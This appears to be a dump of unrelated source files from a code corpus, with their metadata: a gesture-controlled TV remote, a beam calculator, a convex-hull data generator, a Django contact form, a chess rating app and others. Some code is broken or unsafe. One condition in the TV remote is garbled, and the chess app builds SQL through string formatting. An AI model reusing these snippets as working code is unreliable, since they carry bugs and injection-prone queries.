label_map_util.create_category_index_from_labelmap('/home/pi/Desktop/tsfw/tffiles/annotations/label_map.pbtxt')\n\ncamera = PiCamera()\n\ncamera.resolution = (640,480)\ncamera.framerate = 32\nrawCapture = PiRGBArray(camera, size=(640,480))\nrawCapture.truncate(0)\n\nfirst_tour=1\nold_command=0\nchannel_digit=0 #sayılar için\nchanging_digit=0 #kanal,ses komutları için\ntv_channel_command=[]\n\nback=time.time()\ntime.sleep(0.1)\nfont=cv2.FONT_HERSHEY_SIMPLEX\n\n\nfor screen in camera.capture_continuous(rawCapture, format=\"bgr\",use_video_port=True):\n\n image_np = np.copy(screen.array)\n image_np.setflags(write=1)\n input_data=np.expand_dims(image_np, 0)\n input_tensor = tf.convert_to_tensor(input_data, dtype=tf.float32)\n detections = detect_fn(input_tensor)\n\n num_detections = int(detections.pop('num_detections'))\n detections = {key: value[0, :num_detections].numpy()\n for key, value in detections.items()}\n detections['num_detections'] = num_detections\n \n detections['detection_classes'] = detections['detection_classes'].astype(np.int64)\n \n label_id_offset = 1\n image_np_with_detections = image_np.copy()\n\n viz_utils.visualize_boxes_and_labels_on_image_array(\n image_np_with_detections,\n detections['detection_boxes'],\n detections['detection_classes'] + label_id_offset,\n detections['detection_scores'],\n category_index,\n use_normalized_coordinates=True,\n max_boxes_to_draw=1,\n min_score_thresh=.5,\n agnostic_mode=False)\n \n truth_rate = detections['detection_scores'][0] #düşük ve algılanmama durumlarını engelleme\n command = detections['detection_classes'][0]+1\n cv2.putText(image_np_with_detections, \"{0:.2f}\".format(int(command)),(30,50),font,1,(255,255,0),2,cv2.LINE_AA) \n resized=cv2.resize(image_np_with_detections, (640,480))\n cv2.imshow('object detection', resized)\n \n threshold1 = 0.75\n threshold2 = 0.6\n \n if channel_digit>0 or changing_digit==1:\n changing_digit=0\n audio.stop()\n \n now= time.time() \n time_difference=(now-back)\n \n if truth_rate2.9 :\n \n if truth_rate>0.3:\n first_tour=1\n \n while len(tv_channel_command) > 0 :\n print(tv_channel_command)\n print(\"basamak: \",channel_digit)\n print(tv_channel_command[0])\n os.system(tv_channel_command[0])\n time.sleep(0.2)\n del tv_channel_command[0]\n tv_channel_command=[] #tamponu boşalt\n channel_digit=0\n \n elif (truth_rate > threshold1) and time_difference>1.5:\n tv_channel=give_command(command)\n print(tv_channel)\n \n if command not in [11,12,13,14,15]: #rakamlarsa hafızala, rakam olmayanları ele\n audio=vlc.MediaPlayer(\"/home/pi/Desktop/tsfw/audios/{0}.mp3\".format(tv_channel))\n audio.play()\n tv_channel_command.append(lets_change(command))\n channel_digit+=1\n back=time.time()\n \n \n elif tv_channel_command== [] : #hafıza boşken kanal-ses komutları gelirse\n print(command)\n audio=vlc.MediaPlayer(\"/home/pi/Desktop/tsfw/audios/{0}.mp3\".format(tv_channel))\n audio.play()\n changing_digit=1\n os.system(lets_change(command)) \n\n \n elif truth_rate < threshold1 and truth_rate > threshold2 and time_difference>1.5 :\n #print('kücük')\n \n if(first_tour == 0): #ilk kontrol değilse\n if(command == old_command)and command!=0 : #hafızayla karşılaştır\n \n old_command=0 #sıfırla- bu tur hafızaya atma\n tv_channel=give_command(command)\n print('hafizali', old_truth, truth_rate, tv_channel)\n if command not in [11,12,13,14,15]: \n audio=vlc.MediaPlayer(\"/home/pi/Desktop/tsfw/audios/{0}.mp3\".format(tv_channel))\n audio.play()\n tv_channel_command.append(lets_change(command))\n \n channel_digit+=1\n back=time.time()\n \n elif tv_channel_command==[] : \n print(command)\n audio=vlc.MediaPlayer(\"/home/pi/Desktop/tsfw/audios/{0}.mp3\".format(tv_channel))\n audio.play()\n changing_digit=1\n os.system(lets_change(command))\n \n \n else: #2 düşük doğruluk oranı olan eşleşmiyorsa ele\n first_tour=1 #yeniden hafıza oluştur\n \n if(first_tour == 1):\n old_command = command\n old_truth = truth_rate\n first_tour=0 #hafızada tut\n \n \n \n key = cv2.waitKey(1) & 0xFF\n \n rawCapture.truncate(0)\n \n if key == ord(\"q\"): \n break\n","sub_path":"TV_REMOTE.py","file_name":"TV_REMOTE.py","file_ext":"py","file_size_in_byte":7716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"616449708","text":"\"\"\"repository templates for manager utils\"\"\"\n\n\nclass RepositoryProfile:\n\n import_statements_pattern = [\n 'from ..type.objects import TypeList',\n 'from ..osid.osid_errors import NullArgument',\n ]\n\n get_coordinate_types_template = \"\"\"\n return TypeList([])\"\"\"\n\n supports_coordinate_type_template = \"\"\"\n if ${arg0_name} is None:\n raise NullArgument()\n return False\"\"\"\n","sub_path":"managerutil_templates/repository.py","file_name":"repository.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"226082043","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nclass Beam:\n\n def __init__(self, length, supports, loads):\n self.length = length\n self.supports = supports\n self.loads = loads\n\n def calculate_reaction_loads(self):\n \"\"\"\n This function calculates the reaction forces from the given supports and loads\n \"\"\"\n load_force = 0\n load_moments = 0\n #This segment of code adds up all of the known forces and moments to put them into our equilibrium equation\n for load in self.loads:\n if load.type == \"point\":\n load_force+=load.load_force\n else:\n load_force+=load.get_resultant(load.location[0],load.location[1])\n for load in self.loads:\n if load.type == \"point\":\n load_moments += load.load_force*load.location\n else:\n load_moments += load.get_resultant(load.location[0],load.location[1])*load.get_centroid(load.location[0], load.location[1])\n #This if statement checks for the two different cases: one fixed support or two roller supports\n if len(self.supports) > 1:\n #This if statement sets up, solves, and stores the system of equilibrium equations for two rollers (two forces are stored)\n left_hand = [[1, 1],[self.supports[0].location, self.supports[1].location]]\n left_hand = np.asarray(left_hand)\n right_hand = np.asarray([-load_force, -load_moments])\n reaction_forces = np.linalg.solve(left_hand, right_hand)\n self.supports[0].reaction_force = reaction_forces[0]\n self.supports[1].reaction_force = reaction_forces[1]\n print(\"Reaction forces (N)\")\n print(reaction_forces)\n else:\n #This if statement sets up, solves, and stores the system of equilibrium equations for one fixed support (one force and one moment are stored)\n left_hand = np.asarray([[1,0],[self.supports[0].location, 1]])\n right_hand = np.asarray([-load_force, -load_moments])\n reactions = np.linalg.solve(left_hand, right_hand)\n self.supports[0].reaction_force = reactions[0]\n self.supports[0].reaction_moment = reactions[1]\n print(\"Reaction force (N) and moment (Nm)\")\n print(reactions)\n\n def calc_shear_force(self):\n \"\"\"\n This function calculates the shear forces for the beam\n \"\"\"\n x = []\n i = 0\n while i<=self.length:\n x.append(i)\n i+=.01\n y = []\n #This for loop traverses along the beam and calculates the shear force at each .01 m interval\n for loc in x:\n force_sum = 0\n for load in self.loads:\n if load.type == \"point\":\n #If the load is a point load, just add the forces\n if load.location < loc:\n force_sum += load.load_force\n else:\n if (load.location[0] < loc) & (load.location[1] < loc):\n #This if statement uses the resultant force from the distributed load\n #if the distributed load is fully inside length we are looking at\n force_sum += load.get_resultant(load.location[0],load.location[1])\n elif (load.location[0] < loc):\n #This if statement is for cases when we are slicing the beam in the middle of a distributed load\n force_sum += load.get_resultant(load.location[0],loc)\n for support in self.supports:\n if support.location < loc:\n force_sum += support.reaction_force\n y.append(force_sum)\n #using matplotlib to plot the length versus shear force\n plot1 = plt.figure(1)\n plt.title(\"Shear Force Diagram\")\n plt.plot(x,y)\n plt.xlabel(\"Distance (m)\")\n plt.ylabel(\"Shear Force (N)\")\n\n def calc_bending_moment(self):\n \"\"\"\n This function calculates the bending moments for the beam\n \"\"\"\n x = []\n i = 0\n while i <= self.length:\n x.append(i)\n i+=.01\n x.append(self.length)\n y = []\n for loc in x:\n moment_sum = 0\n for load in self.loads:\n if load.type == \"point\":\n #Calculates and adds moment to total for each load if load is within the length of the beam we are looking at\n if load.location < loc:\n moment_sum += load.load_force*(loc-load.location)\n else:\n #Calculates and adds moment to total for each distributed load if load is within the length of the beam we are looking at\n #Using centroid and resultant means we can treat the uneven and even distributed loads the same here\n if (load.location[0] < loc) & (load.location[1] < loc):\n moment_sum += load.get_resultant(load.location[0],load.location[1])*(loc-load.get_centroid(load.location[0], load.location[1]))\n #Case for where we are slicing in the middle of the distributed load\n elif(load.location[0] < loc):\n moment_sum += load.get_resultant(load.location[0],loc)*(loc-(load.get_centroid(load.location[0], loc)))\n for support in self.supports:\n if support.location < loc:\n moment_sum += support.reaction_force*(loc-support.location)\n moment_sum -= support.reaction_moment\n y.append(moment_sum)\n #Plot the moments\n plot2 = plt.figure(2)\n plt.plot(x,y)\n plt.title(\"Bending Moment Diagram\")\n plt.xlabel(\"Distance (m)\")\n plt.ylabel(\"Bending Moment (Nm)\")\n","sub_path":"beam.py","file_name":"beam.py","file_ext":"py","file_size_in_byte":5888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"177541899","text":"import datetime\nimport random\nimport run_step\nimport transfer_data\n\ndef get_uniquetablename():\n return 'user{0}'.format(datetime.datetime.now().microsecond + (random.randrange(1, 100+1) * 100000))\n\ndef run_simple(algorithm, global_node, local_nodes, localtable, globaltable, viewlocaltable):\n try:\n run_step.run_local(local_nodes,localtable, algorithm, viewlocaltable)\n transfer_data.merge(global_node, local_nodes, localtable, globaltable)\n result = run_step.run_global_final(global_node, globaltable, algorithm)\n except:\n run_step.clean_up(global_node,local_nodes, globaltable,localtable)\n raise\n run_step.clean_up(global_node,local_nodes, globaltable,localtable)\n return result\n \ndef run_iterative(algorithm, global_node, local_nodes, localtable, globaltable, globalresulttable, viewlocaltable):\n j = 0\n try:\n run_step.run_local_init(local_nodes,localtable, algorithm, viewlocaltable)\n j+=1\n for i in range(20):\n transfer_data.merge(global_node, local_nodes, localtable, globaltable)\n\n run_step.run_global_iter(global_node, local_nodes, globaltable, localtable, globalresulttable, algorithm, viewlocaltable)\n j+=1\n\n transfer_data.broadcast(global_node, local_nodes, globalresulttable)\n\n run_step.run_local_iter(local_nodes,localtable, globalresulttable, algorithm, viewlocaltable)\n j+=1\n\n transfer_data.merge(global_node, local_nodes, localtable, globaltable)\n result = run_step.run_global_final(global_node, globaltable, algorithm)\n j+=1\n print(j)\n except:\n run_step.clean_up(global_node,local_nodes, globaltable,localtable, viewlocaltable,globalresulttable )\n raise\n \n \n run_step.clean_up(global_node,local_nodes, globaltable,localtable, viewlocaltable, globalresulttable)\n \n return result\n\n\ndef run(algorithm, params, global_node, local_nodes):\n \n table_id = get_uniquetablename()\n localtable = \"local\"+table_id\n globaltable = \"global\"+table_id\n viewlocaltable = 'localview'+table_id\n globalresulttable = \"globalres\"+table_id\n ## create viewlocaltable with params\n run_step.createlocalviews(local_nodes, viewlocaltable,params)\n ### check algorithm category\n\n #return run_simple(algorithm, params, global_node, local_nodes, localtable, globaltable, viewlocaltable)\n return run_iterative(algorithm,global_node, local_nodes, localtable, globaltable, globalresulttable, viewlocaltable)\n \n \n","sub_path":"run_algorithm.py","file_name":"run_algorithm.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"642395413","text":"\"\"\"\nProblem2 (https://leetcode.com/problems/01-matrix/)\nGiven a matrix consists of 0 and 1, find the distance of the nearest 0 for each cell.\n\nThe distance between two adjacent cells is 1.\n\nExample 1:\nInput:\n\n0 0 0\n\n\n0 1 0\n\n\n0 0 0\n\nOutput:\n\n0 0 0\n\n\n0 1 0\n\n\n0 0 0\n\nExample 2:\nInput:\n\n0 0 0\n\n\n0 1 0\n\n\n1 1 1\n\nOutput:\n\n0 0 0\n\n\n0 1 0\n\n\n1 2 1\n\nTIME- 0(n*m)\nSPACE- 0(n*m)\nLEETCODE - Yes\n\n\"\"\"\n\n#BFS convert all 1's to infiniti and append all zeros into queue\n# start popping from queue and use directions array to\nclass Solution:\n def updateMatrix(self, matrix: List[List[int]]) -> List[List[int]]:\n if matrix == None or len(matrix) == 0:\n return matrix\n m = len(matrix)\n n = len(matrix[0])\n q = collections.deque()\n for i in range(m):\n for j in range(n):\n if matrix[i][j] == 1:\n matrix[i][j] = float('inf')\n else:\n q.append([i, j]) # when found 0 add the position to q\n\n directions = [[0, 1], [1, 0], [-1, 0], [0, -1]] #direction array\n while q: #traverse the tree\n size = len(q)\n for i in range(size):\n root = q.popleft()\n root_i = root[0]\n root_j = root[1]\n for direc in directions:\n r = root_i + direc[0]\n c = root_j + direc[1]\n # current element matrix[root_i][root_j]\n # new element matrix[r][c]\n if r < m and r >= 0 and c < n and c >= 0 and matrix[root_i][root_j] + 1 < matrix[r][c]:\n q.append([r, c]) #ADD TO QUEUE if matrix[root_i][root_j] + 1 (current dstance) < new distance\n\n matrix[r][c] = matrix[root_i][root_j] + 1 # change the distance of new element\n return matrix\n\n\n","sub_path":"Problem-2.py","file_name":"Problem-2.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"265115204","text":"# chess objects and functions\n\n# utf-8\n\n\"\"\"\nRemake of an old chess calculator I made back in 1998\n\"\"\"\nimport tkinter as tk\nimport sqlite3\n# import wrapper_sqlite3\n\nconn = sqlite3.connect(\"data\\\\chess.db\")\n\n\n# function for rebuilding the database to zero ##############################\ndef rebuild():\n curs = conn.cursor()\n SQLscript = \"\"\n with open('chess.db.sql', 'r') as f:\n SQLscript = f.readlines()\n curs.executescript(SQLscript)\n\n\n# object for managing players ###############################################\nclass Player(object):\n def __init__(self, **kwargs):\n self.ID = kwargs.get('ID', \"\")\n self.name = kwargs.get('name', \"\")\n self.score = kwargs.get('score', 1000)\n self.games_played = kwargs.get('games_played', 0)\n self.provisional = self.games_played > 10\n\n def calculate(self, **kwargs):\n \"\"\" calculate this players new score \"\"\"\n I_Won = kwargs.get('I_Won', False)\n opponent_score = kwargs.get('opponent_score', 1000)\n winner = 1 if I_Won else -1\n winner *= 10 if self.provisional else 1\n self.games_played += 1\n self.my_score += int(abs(self.score-opponent_score)/10 * winner)\n\n\n# object for managing games #################################################\nclass game(object):\n def __init__(self):\n self.p_WHITE = None\n self.p_BLACK = None\n # result is 0 for tie, 1 for WHITE and 2 for BLACK\n self.result = None\n\n\n# object for main application window ########################################\nclass Application(tk.Frame):\n def __init__(self, master):\n super(Application, self).__init__(master)\n self.curs = conn.cursor()\n self.grid()\n self.create_widgets()\n\n def create_player(self, ID):\n SQL = \"\"\"SELECT * FROM players\n WHERE ID = %s;\"\"\"\n\n data = self.curs.execute(SQL).fetchall()\n\n temp = Player(ID=int(data[0][0]),\n name=data[0][1],\n score=int(data[0][2]),\n games_played=int(data[0][3]))\n return temp\n\n def save(self, temp):\n SQL = \"\"\" UPDATE players SET score = %s, games_played = %s,\n provisional = %s WHERE ID = %s;\"\"\" \\\n % (temp.score, temp.games_played, temp.provisional, temp.ID)\n self.curs.execute(SQL)\n conn.commit()\n\n def create_widgets(self):\n menubar = tk.Menu(self)\n filemenu = tk.Menu(menubar)\n filemenu.add_command(label='New Player', command=self.new_Player)\n filemenu.add_command(label='New Game', command=self.new_Game)\n\n filemenu.add_command(label='Save', command=self.save)\n filemenu.add_command(label='Reset', command=self.clear)\n\n menubar.add_cascade(label='File', menu=filemenu)\n menubar.add_command(label='Quit', command=tk.root.quit)\n\n self.lbl_1 = tk.Label(self, text='The Bowling Calculator')\n self.lbl_1.grid(row=0, columnspan=3)\n\n self.lbl_2 = tk.Label(self, text='Enter score from game 1 ')\n self.lbl_3 = tk.Label(self, text='Enter score from game 2 ')\n self.lbl_4 = tk.Label(self, text='Enter score from game 3 ')\n self.lbl_5 = tk.Label(self, text='Average:')\n self.lbl_2.grid(row=2, column=0)\n self.lbl_3.grid(row=3, column=0)\n self.lbl_4.grid(row=4, column=0)\n self.lbl_5.grid(row=5, column=0)\n\n self.score_1 = tk.Entry(self)\n self.score_2 = tk.Entry(self)\n self.score_3 = tk.Entry(self)\n self.avg = tk.Entry(self)\n self.score_1.grid(row=2, column=1)\n self.score_2.grid(row=3, column=1)\n self.score_3.grid(row=4, column=1)\n self.avg.grid(row=5, column=1)\n\n self.btn_1 = tk.Button(self, text='Calculate Average',\n command=self.calculate)\n self.btn_2 = tk.Button(self, text='Clear Result', command=self.clear)\n self.btn_1.grid(row=6, column=0)\n self.btn_2.grid(row=6, column=1)\n\n self.score_1.focus_set()\n tk.root.config(menu=menubar)\n\n def calculate(self):\n numScore_1 = int(self.score_1.get())\n numScore_2 = int(self.score_2.get())\n numScore_3 = int(self.score_3.get())\n total = numScore_1 + numScore_2 + numScore_3\n average = total / 3\n\n strAverage = \"{0:.2f}\".format(average)\n self.avg.insert(0, strAverage)\n\n def clear(self):\n self.score_1.delete(0, tk.END)\n self.score_2.delete(0, tk.END)\n self.score_3.delete(0, tk.END)\n self.avg.delete(0, tk.END)\n self.score_1.focus_set()\n\n\n# object for main application window ########################################\nclass choose_player(tk.Frame):\n def __init__(self, master, position):\n super(Application, self).__init__(master)\n self.curs = conn.cursor()\n self.grid()\n self.create_widgets()\n self.position = position\n\n def create_widgets(self):\n SQL = \"\"\" SELECT ID, name FROM players;\"\"\"\n data = self.curs.execute(SQL).fetchall()\n names = data[0]\n listheight = len(names) if len(names) < 10 else 10\n\n self.lbl_1 = tk.Label(self, text='Choose a Player')\n self.lbl_1.grid(row=0, column=0, sticky=W+E)\n self.lst_players = tk.List(self, selecttype=tk.SINGLE,\n height=listheight)\n self.lst_players.grid(row=1, column=0, sticky=W+E)\n\n for name in names:\n self.lst_players.insert(tk.END, name)\n\n\n\"\"\" end \"\"\"\n","sub_path":"ChessCalc/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":5514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"77256544","text":"import sys\nfrom search import *\nfrom repo_search import RepoSearch\nfrom contribution_search import ContributionSearch\nfrom code_search import CodeSearch\nfrom issue_search import IssueSearch\n\ndef search():\n # remove gitsearch from the list of args\n args = sys.argv[1:]\n search = None\n\n search_dict = {\n \"repos\": RepoSearch,\n \"contributions\": ContributionSearch,\n \"issues\": IssueSearch,\n \"code\": CodeSearch\n }\n\n if len(args) == 0 or args[0] not in ['repos', 'contributions', \n 'issues', 'code']:\n raise BadArgsException(\"The first arguement passed must be either \" +\\\n \"'repos', 'contributions', 'issues' or 'code'\")\n else:\n search = search_dict[args[0]](args=args[1:], kwargs=None)\n search.print_data()\n","sub_path":"gitsearch/_main.py","file_name":"_main.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"221453559","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\n\nimport numpy as np\nimport matplotlib.cm as cm\nimport PIL.Image as Image\nfrom scipy.misc import imresize\n\n\ndef create_jpeg(img, output_filename):\n jet = cm.get_cmap('jet')\n mn = np.min(img)\n mx = np.max(img)\n img = img - mn\n img = img*(1.0)/((mx-mn)*(1.0))\n img = np.maximum(0.0, np.minimum(1.0, img))\n img = jet(img[0,:,:,0])[:,:,0:3]\n print(img.shape)\n #raw_input(\"see above\")\n img *= 255.0\n img = np.uint8(img)\n print(img)\n print(img.shape)\n print(img.dtype)\n print(img.shape)\n #raw_input(\"what do we see?\")\n img = Image.fromarray(img)\n img.save(output_filename)\n print(\"saved %s\" % output_filename)\n\ndef is_closed_five_point_box(points):\n assert len(points)==5\n ptA = points[0]\n # need to finish\n return True\n\ndef prep_img_for_vgg16(img, mean_to_subtract=None, interp='lanczos'):\n # resize options are here: https://docs.scipy.org/doc/scipy/reference/generated/scipy.misc.imresize.html\n #dest = np.empty((224,224,3), dtype=np.float32)\n dest = img\n #if img.dtype != np.float32:\n # img = img.astype(np.float32)\n\n #assert len(img.shape)==2\n\n #if img.shape != (224, 224):\n # img = imresize(img, (224,224), interp=interp, mode='F')\n\n orig_resized_mean = np.mean(img)\n\n #if mean_to_subtract is None:\n # mean_to_subtract = orig_resized_mean\n\n #img -= mean_to_subtract\n\n #for ch in range(3):\n # dest[:,:,ch]=img[:,:]\n \n #dest = np.expand_dims(dest, axis=0)\n return dest, orig_resized_mean\n","sub_path":"sslearnpipeline/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"272390585","text":"import numpy as np\nfrom scipy.spatial import ConvexHull\n\n\nclass DataGenerator(object):\n def __init__(self):\n \"\"\"Construct a DataGenerator.\"\"\"\n pass\n\n def next_batch(self, batch_size, N, train_mode=True, convex_hull=False):\n \"\"\"Return the next batch of the data\"\"\"\n # If training on the convex hull problem: sequence of random points from [0, 1] x [0, 1]\n # If training on the sorting problem: sequence of random real numbers in [0, 1]\n reader_input_batch = []\n\n # Sorted sequence that we feed to encoder\n # In inference we feed an unordered sequence again\n decoder_input_batch = []\n\n # Ordered sequence where one hot vector encodes position in the input array\n writer_outputs_batch = []\n olen=N\n if convex_hull:\n for _ in range(N):\n reader_input_batch.append(np.zeros([batch_size, 2]))\n for _ in range(N + 1):\n decoder_input_batch.append(np.zeros([batch_size, 2]))\n writer_outputs_batch.append(np.zeros([batch_size, N + 1]))#ground truth one-hot\n\n for b in range(batch_size):\n sequence = np.random.rand(N, 2)\n leftmost_point = np.argmin(sequence[:, 0])\n hull = ConvexHull(sequence)\n v = hull.vertices\n v = np.roll(v, -list(v).index(leftmost_point)) # start from leftmost point\n for i in range(N):\n reader_input_batch[i][b] = sequence[i]\n\n for i in range(len(v)):\n if train_mode:\n decoder_input_batch[i + 1][b] = sequence[v[i]]#enforcing training\n else:\n decoder_input_batch[i + 1][b] = sequence[i]\n writer_outputs_batch[i][b, v[i]+1 ] = 1#correct convex hull point\n\n # Write the stop symbol\n for i in range(len(v), N):\n writer_outputs_batch[i][b, 0] = 1\n if not train_mode:\n decoder_input_batch[i + 1][b] = sequence[i]\n writer_outputs_batch[N][b, 0] = 1\n olen = len(v)\n else:\n\n for _ in range(N):\n reader_input_batch.append(np.zeros([batch_size, 1]))\n for _ in range(N + 1):\n decoder_input_batch.append(np.zeros([batch_size, 1]))\n writer_outputs_batch.append(np.zeros([batch_size, N + 1]))\n\n for b in range(batch_size):\n shuffle = np.random.permutation(N)\n sequence = np.sort(np.random.random(N))\n shuffled_sequence = sequence[shuffle]\n\n for i in range(N):\n reader_input_batch[i][b] = shuffled_sequence[i]\n if train_mode:\n decoder_input_batch[i + 1][b] = sequence[i]\n else:\n decoder_input_batch[i + 1][b] = shuffled_sequence[i]\n writer_outputs_batch[shuffle[i]][b, i + 1] = 1\n\n # Points to the stop symbol\n writer_outputs_batch[N][b, 0] = 1\n\n # size is seq_len x batch x dim\n # input for encoder, input for decoder, output\n return reader_input_batch, decoder_input_batch, writer_outputs_batch, olen\nimport sys\nimport pickle\ndef llprint(message):\n sys.stdout.write(message)\n sys.stdout.flush()\n\ndef dump_convex_hull(length_from, length_to, num_samples):\n dataset = DataGenerator()\n all_samples=[]\n for i in range(num_samples):\n ll = np.random.randint(length_from, length_to + 1)\n r, d, w, olen = dataset.next_batch(1, ll, train_mode=True, convex_hull=True)\n all_samples.append((r,d,w,olen))\n llprint('\\r{}/{}'.format(i,num_samples))\n print('start dump..')\n pickle.dump(all_samples, open('./data/convex_hull/train-l50.pkl','wb'))\n\n\nif __name__ == \"__main__\":\n # dataset = DataGenerator()\n # r, d, w, olen = dataset.next_batch(1, 5, train_mode=False, convex_hull=True)\n # print(\"Reader: \", r)\n # print(\"Decoder: \", d)\n # print(\"Writer: \", w)\n\n dump_convex_hull(50,50,100000)","sub_path":"gen-dnc/pointer_task/preppare_comb_problem.py","file_name":"preppare_comb_problem.py","file_ext":"py","file_size_in_byte":4180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"249872231","text":"from django.shortcuts import render\nfrom django.core.mail import send_mail\nfrom django.conf import settings\n\n\n#contactForm imported into the view\nfrom .forms import ContactForm\n\n# Create your views here.\ndef contact(request):\n\ttitle = 'Contact Us'\n\t#The view also need to handle the contactForm so,\n\tform = ContactForm(request.POST or None)\n\tconfirm_message = None\n\tif form.is_valid():\n\t\tname = form.cleaned_data['name']\n\t\tcomment = form.cleaned_data['comment']\n\t\tsubject = 'Message from MYSITE.com'\n\t\tmessage = '%s %s' %(comment,name)\n\t\t#Ensures that the Email from is\n\t\t#That email that a user fills in the contactForm\n\t\temailFrom = form.cleaned_data['email']\n\t\temailTo = [settings.EMAIL_HOST_USER]\n\t\tsend_mail(subject, message, emailFrom, emailTo, fail_silently = True)\n\t\ttitle = \"Thanks!\"\n\t\tconfirm_message = \"Thanks for the message we will get back right to you.\"\n\t\tform = None\n\n\tcontext = {'title': title, 'form': form, 'confirm_message': confirm_message, }\n\ttemplate='contact.html'\n\treturn render(request, template, context)","sub_path":"lalaespace/contact/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"215316946","text":"import requests\nfrom bs4 import BeautifulSoup\n\ndef start():\n GetNews('Газпром')\n\n\n\ndef GetNews(search_text):\n resp = requests.get('http://mediametrics.ru/search/week.html#ru:tm:'+search_text)\n with open('./index.html','w') as f:\n f.write(str(resp.content))\n\n html_page = BeautifulSoup(resp.content,'html.parser')\n allnews = html_page.find('div',id='news').find_all('div', class_='rs-link')\n print(allnews)\n\nif __name__ == '__main__':\n start() ","sub_path":"news_scrapper.py","file_name":"news_scrapper.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"577186508","text":"\"\"\"\nGiven an unsorted array of integers, find the length of the longest\nconsequtive elements sequence.\n\nGiven [100, 4, 200, 1, 3, 2]\nthe longest consecqutive elements squence is [1, 2, 3, 4]\nreturn is 4\n\nSolve it in O(n) complexity\n\"\"\"\nclass Solution(object):\n def longestConsecutive(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n if not nums :\n return 0\n dic = dict()\n for n in nums:\n if n not in dic:\n dic[n] = 1\n res = 1\n for n in nums:\n current = 1\n if n not in dic :\n continue\n while n - 1 in dic :\n n -= 1\n del dic[n]\n while n + i in dic:\n n += 1\n current += 1\n del dic[n]\n res = max(res, current)\n return res","sub_path":"Array/128-Longest Consecutive Sequence/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"481750360","text":"\"\"\"Typing module.\"\"\"\n\nimport abc\nimport itertools\nfrom typing import Any, Callable, List, Optional, Protocol, Sequence, TypeVar, Union\n\nimport numpy as np\nimport numpy.typing as npt\n\nfrom skrough.structs.description_node import DescriptionNode\nfrom skrough.structs.state import ProcessingState\n\n# Chaos measures\nChaosMeasureReturnType = float\n# \"\"\"Return type of chaos measure functions.\"\"\"\nChaosMeasure = Callable[[np.ndarray, int], ChaosMeasureReturnType]\n# \"\"\"A type/signature of chaos measure functions.\"\"\"\n\n\n# Random\nSeed = Optional[Union[int, np.random.SeedSequence, np.random.Generator]]\n# \"\"\"A type for values which can be used as a random seed.\"\"\"\n\n\n# Collections\nElements = Union[Sequence, np.ndarray]\nLocations = npt.NDArray[np.int64]\nLocationsLike = Union[Sequence[int], Locations]\n\nT = TypeVar(\"T\")\nOneOrSequence = Union[\n T,\n Sequence[T],\n]\n\n\n# Predict strategy\nclass PredictStrategyFunction(Protocol):\n @abc.abstractmethod\n def __call__(\n self,\n reference_ids: np.ndarray,\n reference_data_y: np.ndarray,\n predict_ids: np.ndarray,\n seed: Seed = None,\n ) -> Any:\n raise NotImplementedError\n\n\n# no-answer strategy - what should be the answer when a classifier \"do not know\"\nclass NoAnswerStrategyFunction(Protocol):\n @abc.abstractmethod\n def __call__(\n self,\n reference_data_y: np.ndarray,\n seed: Seed = None,\n ) -> Any:\n raise NotImplementedError\n\n\n# Permutation strategy\nclass ObjsAttrsPermutationStrategyFunction(Protocol):\n @staticmethod\n @abc.abstractmethod\n def __call__(\n n_objs: int,\n n_attrs: int,\n objs_weights: Optional[Union[int, float, np.ndarray]] = None,\n attrs_weights: Optional[Union[int, float, np.ndarray]] = None,\n rng: Seed = None,\n ) -> Any:\n raise NotImplementedError\n\n\n# Processing/stage functions\nclass PrepareResultFunction(Protocol):\n @staticmethod\n @abc.abstractmethod\n def __call__(\n state: ProcessingState,\n ) -> Any:\n raise NotImplementedError\n\n\n# Hook functions - to be composed/aggregated into processing/stage functions\nclass StopHook(Protocol):\n @staticmethod\n @abc.abstractmethod\n def __call__(\n state: ProcessingState,\n ) -> bool:\n raise NotImplementedError\n\n\nclass InnerStopHook(Protocol):\n @staticmethod\n @abc.abstractmethod\n def __call__(\n state: ProcessingState,\n elements: Elements,\n ) -> bool:\n raise NotImplementedError\n\n\nclass UpdateStateHook(Protocol):\n @staticmethod\n @abc.abstractmethod\n def __call__(\n state: ProcessingState,\n ) -> None:\n raise NotImplementedError\n\n\nclass ProduceElementsHook(Protocol):\n @staticmethod\n @abc.abstractmethod\n def __call__(\n state: ProcessingState,\n ) -> Elements:\n raise NotImplementedError\n\n\nclass ProcessElementsHook(Protocol):\n @staticmethod\n @abc.abstractmethod\n def __call__(\n state: ProcessingState,\n elements: Elements,\n ) -> Elements:\n raise NotImplementedError\n\n\n# Describable\nclass Describable(abc.ABC):\n @abc.abstractmethod\n def get_description_graph(self) -> DescriptionNode:\n \"\"\"Get a description graph.\n\n Prepare a description structure for the instance.\n\n Returns:\n A description graph structure representing the instance.\n \"\"\"\n\n @abc.abstractmethod\n def get_config_keys(self) -> 